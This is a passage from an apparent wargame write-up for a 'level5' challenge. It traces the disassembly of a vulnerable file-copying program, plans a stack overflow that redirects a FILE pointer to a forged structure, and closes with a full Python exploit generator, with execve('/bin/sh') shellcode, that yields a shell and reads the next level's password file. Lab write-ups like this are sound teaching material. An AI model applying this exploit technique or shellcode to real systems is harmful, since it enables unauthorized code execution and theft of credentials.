 8048225: c7 44 24 04 88 32 0a  movl   $0x80a3288,0x4(%esp)
 804822c: 08 
 804822d: c7 04 24 8a 32 0a 08  movl   $0x80a328a,(%esp)
 8048234: e8 57 af 00 00        call   8053190 <_IO_new_fopen>
 8048239: 89 45 f0              mov    %eax,0xfffffff0(%ebp)
And the output, which is a file pointer, is stored at ebp-0x10, which must be our fp.

Now let's look at the call to _IO_fread:
 8048285: 8b 45 f0              mov    0xfffffff0(%ebp),%eax
 8048288: 89 44 24 0c           mov    %eax,0xc(%esp)
 804828c: c7 44 24 08 64 00 00  movl   $0x64,0x8(%esp)
 8048293: 00 
 8048294: c7 44 24 04 01 00 00  movl   $0x1,0x4(%esp)
 804829b: 00 
 804829c: 8d 45 88              lea    0xffffff88(%ebp),%eax
 804829f: 89 04 24              mov    %eax,(%esp)
 80482a2: e8 09 b0 00 00        call   80532b0 <_IO_fread>
 80482a7: 89 45 ec              mov    %eax,0xffffffec(%ebp)
The first parameter is at the bottom of the stack (at esp), this should be the address of buf, and we can see it is ebp-0x78.
The rest of the parameters are already known to us so I won't stall on them.
What's left in this function call is the return value, which is stored at ebp-0x14 and is our len.

The last local variable is i, we can recognize it as the address that gets loaded with a 0, as we can see in the for loop initialization.
There are actually two such instances. This is the first one:
 8048242: c7 85 78 d7 ff ff 00  movl   $0x0,0xffffd778(%ebp)
Which is the return value of main, as we can see eax is reloaded from that address right before exiting main:
 80482e0: 8b 85 78 d7 ff ff     mov    0xffffd778(%ebp),%eax
 80482e6: 81 c4 94 28 00 00     add    $0x2894,%esp
 80482ec: 59                    pop    %ecx
 80482ed: 5d                    pop    %ebp
 80482ee: 8d 61 fc              lea    0xfffffffc(%ecx),%esp
 80482f1: c3                    ret
The second one is the one that interests us:
 8048251: c7 45 f8 00 00 00 00  movl   $0x0,0xfffffff8(%ebp)
Which means i is stored at ebp-0x8.

Let's summarize it all up in one diagram:
Stack frame of main
Imagine now the following scenario: We have a very big file, and the read-chunk-and-copy loop keeps copying the data from buf into fixedbuf. After 102 of these cycles, ptr is pointing to fixedbuf+10200, or, buf-40. After the next cycle, ptr will point to buf+60. This means, that on the next read (104'th if my tally has been kept correctly) ptr will end up pointing beyond the stack frame.
Not entirely though. The thing is, that the copying is not done in one atomic operation, rather, buf is copied to ptr byte-by-byte, which means that 40 bytes into the 104'th cycle, the value of len will change. This affects the flow control of the for-loop, because if we make len smaller than i is in that round, the loop will stop.
Since x86 is a little-endian machine, the first byte of len that will be overwritten is the LSB, so we need to overwrite it so that the loop continues, anything larger than 101 will do.
Now, remember that not all byte values are allowed, and if we want to reach interesting places in the stack, we are forced to write the rest of len. This means that the smallest value we can write is 0x02, and this will make len look something like 0x020202?? when we are done with it.
Next we override fp, again, we can't help but to overwrite it.Let's leave the discussion about it for later though.
After that comes ptr, and this is where it gets tricky, we are overwriting the pointer, using itself as a pointer to its individual bytes. whichever way it goes, once we overwrite the LSB, the pointer will not point to itself anymore, so we need to decide were we want it to point. Well, how about skipping over the rest of ptr, and continue at the MSB of i.
Why would we want to do that? well, remember we put something like 0x020202?? in len? then if we set the MSB of i to 0x03, then i will look like 0x03?????? which is bigger than len! so after that the loop will stop.
Why do we want it to stop now? Well, you see, when the loop on i stops, there will be another call to fread, only now, fp is different.
What would happen? Well, let's take a look at that _IO_fread (cropped in favor of readability):
080532b0 <_IO_fread>:
 80532b0: 55                    push   %ebp
 80532b1: 89 e5                 mov    %esp,%ebp
 80532b3: 83 ec 2c              sub    $0x2c,%esp
 80532b6: 89 75 f8              mov    %esi,0xfffffff8(%ebp)
 80532b9: 8b 75 0c              mov    0xc(%ebp),%esi
 80532bc: 89 7d fc              mov    %edi,0xfffffffc(%ebp)
 80532bf: 8b 7d 10              mov    0x10(%ebp),%edi
 80532c2: 89 5d f4              mov    %ebx,0xfffffff4(%ebp)
 80532c5: 0f af f7              imul   %edi,%esi
 80532c8: 85 f6                 test   %esi,%esi
 80532ca: 0f 84 a4 00 00 00     je     8053374 <_IO_fread+0xc4>
 80532d0: 8b 55 14              mov    0x14(%ebp),%edx
 80532d3: c7 45 e0 00 00 00 00  movl   $0x0,0xffffffe0(%ebp)
 80532da: 8b 02                 mov    (%edx),%eax
 80532dc: 25 00 80 00 00        and    $0x8000,%eax
 80532e1: 66 85 c0              test   %ax,%ax
 80532e4: 75 1f                 jne    8053305 <_IO_fread+0x55>
 80532e6: b8 00 00 00 00        mov    $0x0,%eax
 80532eb: 85 c0                 test   %eax,%eax
 80532ed: c7 45 e0 00 00 00 00  movl   $0x0,0xffffffe0(%ebp)
 80532f4: 0f 85 7e 00 00 00     jne    8053378 <_IO_fread+0xc8>
 80532fa: 8b 45 14              mov    0x14(%ebp),%eax
 80532fd: 89 04 24              mov    %eax,(%esp)
 8053300: e8 bb 40 02 00        call   80773c0 <_IO_flockfile>
 8053305: 8b 55 14              mov    0x14(%ebp),%edx
 8053308: 8b 45 08              mov    0x8(%ebp),%eax
 805330b: 89 74 24 08           mov    %esi,0x8(%esp)
 805330f: 89 14 24              mov    %edx,(%esp)
 8053312: 89 44 24 04           mov    %eax,0x4(%esp)
 8053316: e8 b5 38 00 00        call   8056bd0 <_IO_sgetn>
 805331b: 8b 55 14              mov    0x14(%ebp),%edx
 805331e: 89 c3                 mov    %eax,%ebx
 8053320: 8b 02                 mov    (%edx),%eax
 8053322: 25 00 80 00 00        and    $0x8000,%eax
 8053327: 66 85 c0              test   %ax,%ax
 805332a: 74 37                 je     8053363 <_IO_fread+0xb3>
...
First, let's remember what are the parameters to _IO_fread, in what order are they in the stack, and where can we see them in the disassembly.
Well, the parameters were (at the bottom) buf, then the chunk length (1), then the number of chunks (100) and finally fp.
This means that inside _IO_fread, we can find fp at ebp+0x14. Let's see what does the function do with it:
 80532d0: 8b 55 14              mov    0x14(%ebp),%edx
 80532d3: c7 45 e0 00 00 00 00  movl   $0x0,0xffffffe0(%ebp)
 80532da: 8b 02                 mov    (%edx),%eax
 80532dc: 25 00 80 00 00        and    $0x8000,%eax
 80532e1: 66 85 c0              test   %ax,%ax
 80532e4: 75 1f                 jne    8053305 <_IO_fread+0x55>
The long-word to which fp points is copied into eax, after which it is masked with 0x8000, and if that bit is set, it jumps to 0x08053305:
 8053305: 8b 55 14              mov    0x14(%ebp),%edx
 8053308: 8b 45 08              mov    0x8(%ebp),%eax
 805330b: 89 74 24 08           mov    %esi,0x8(%esp)
 805330f: 89 14 24              mov    %edx,(%esp)
 8053312: 89 44 24 04           mov    %eax,0x4(%esp)
 8053316: e8 b5 38 00 00        call   8056bd0 <_IO_sgetn>
This is a call to _IO_sgetn with fp as the first parameter.
Fine, let's see what _IO_sgetn does:
08056bd0 <_IO_sgetn>:
 8056bd0: 55                    push   %ebp
 8056bd1: 89 e5                 mov    %esp,%ebp
 8056bd3: 8b 55 08              mov    0x8(%ebp),%edx
 8056bd6: 5d                    pop    %ebp
 8056bd7: 8b 8a 94 00 00 00     mov    0x94(%edx),%ecx
 8056bdd: 8b 49 20              mov    0x20(%ecx),%ecx
 8056be0: ff e1                 jmp    *%ecx
 8056be2: 8d b4 26 00 00 00 00  lea    0x0(%esi),%esi
 8056be9: 8d bc 27 00 00 00 00  lea    0x0(%edi),%edi
In the context of _IO_sgetn, fp is located at ebp+0x8.
Well, there's some pointer magic is happening here, after which there a jump to a location stored in ecx.
let's try to write it a more readable C notation:
edx = fp;
ecx = *(unsigned long *)(edx + 0x94);
ecx = *(unsigned long *)(ecx + 0x20);
It looks like fp actually points to some structure, which contains pointers to other structures, which contain an address of a handler.
Well, if we can make the program jump to our handler, we can make it execute a shell.

OK then, let's look back and review what we know, and decide on a strategy.
Well, first, we have found a way to override fp, and then stop the loop and make fread run again.
Then we saw that in fread, some address is extracted from fp, and then the program jumps to that address.
I propose then the following strategy:
  1. We override fp with the address of the bottom of fixedbuf.
  2. We prepare the first long word at the bottom of fixedbuf to be something like 0x????80??, so as to steer the execution path in our direction.
  3. 0x94 bytes after the beginning of fixedbuf, we prepare a pointer to another place in fixedbuf. let's call it ptr1.
  4. 0x20 bytes after ptr1, we will prepare another address which will be the address of our shellcode.
It should be much easier to understand this in a diagram:
This is the structure we need to have in the beginning of our file.
Assuming we know ebp, the end of the file (meaning, starting from the point in which we overwrite len) should look like this:
  1. First 0x70, just to make sure we keep the for-loop alive.
  2. Then 0x020202 because we have to
  3. Then we overwrite fp with fixedbuf=ebp-0x2878
  4. Then we overwrite the LSB of ptr with the address of the second to MSB of i. That is because after we overwrite the LSB of ptr, it will get incremented in the next line of code, this would make ptr point to the LSB of i.
  5. And then we overwrite the MSB of i with 0x03 which will cause the loop to stop, and let the bottom of the file do its magic.
Between the beginning and the end, we need to fill the space with something.

The only open question left is - what is ebp?
Let's take a look:
level5@blackbox:~$ gdb list
...
(gdb) break main
Breakpoint 1 at 0x8048216
(gdb) run
Starting program: /home/level5/list 

Breakpoint 1, 0x08048216 in main ()
(gdb) p $ebp
$1 = (void *) 0xbfffd8f8

Well, this means that we need to override fp with ebp-0x2878=0xbfffb080.
This is not good, because in 0xbfffb0a0 we have 0xff which we can not write.
This pretty much closes the lid on everything we were planning so far, because the basic premise of the entire strategy is that we can redirect fp to our own file structure.
However, we should not abandon all hope, because we have the power to make the stack begin much lower by simply feeding some very long argument to the program. Let's see how this works:
(gdb) run `python -c "print 'a'*0x100"`
Starting program: /home/level5/list `python -c "print 'a'*0x100"`

Breakpoint 1, 0x08048216 in main ()
(gdb) p $ebp
$1 = (void *) 0xbfffd7f8
This address is lower by 0x100 bytes than ebp when running without parameters. Let's try again now with an even larger number:
(gdb) run `python -c "print 'a'*0x10000"`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/level5/list `python -c "print 'a'*0x10000"`

Breakpoint 1, 0x08048216 in main ()
(gdb) p $ebp
$2 = (void *) 0xbffed8f8
Bingo! that is our ebp for reasons I'll go into in a pending article. Suffice to say that when running list inside gdb we have argv[0]=/home/level5/list (as I highlighted above) , and when running from /tmp we have argv[0]=/home/level5/list, which are the same.

Well, now that we have all our constants and strategies settled down, we can generate the input file. I like using scripts:
level5@blackbox:~$ cd /tmp/
level5@blackbox:/tmp$ cat > genfile.py
import struct
EBP = 0xbffed8f8
FIXEDBUF = EBP - 0x2878
I = EBP - 0x8
PTR1 = FIXEDBUF + 0x98
PTR2 = FIXEDBUF + 0xbc
SHELLCODE = "31c050682f2f7368682f62696e89e3505389e131d2b00bcd80".decode("hex")

FILE = ""
FILE += struct.pack("<L", 0x08080808)
FILE += '\x90' * 0x90
FILE += struct.pack("<L", PTR1)
FILE += '\x90' * 0x20
FILE += struct.pack("<L", PTR2)
FILE += SHELLCODE
FILE += '\x90' * (10340 - len(FILE))
FILE += struct.pack("<L", 0x02020270)
FILE += struct.pack("<L", FIXEDBUF)
FILE += struct.pack("<L", I + 2)[0]
FILE += '\x03'

f = open('somefile', 'wb')
f.write(FILE)
f.close()

level5@blackbox:/tmp$ python genfile.py
Let's give it a shot:
level5@blackbox:/tmp$ ~/list `python -c "print 'a'*0x10000"`
sh-3.1$ cat /home/level6/password
???????????????
And we're done!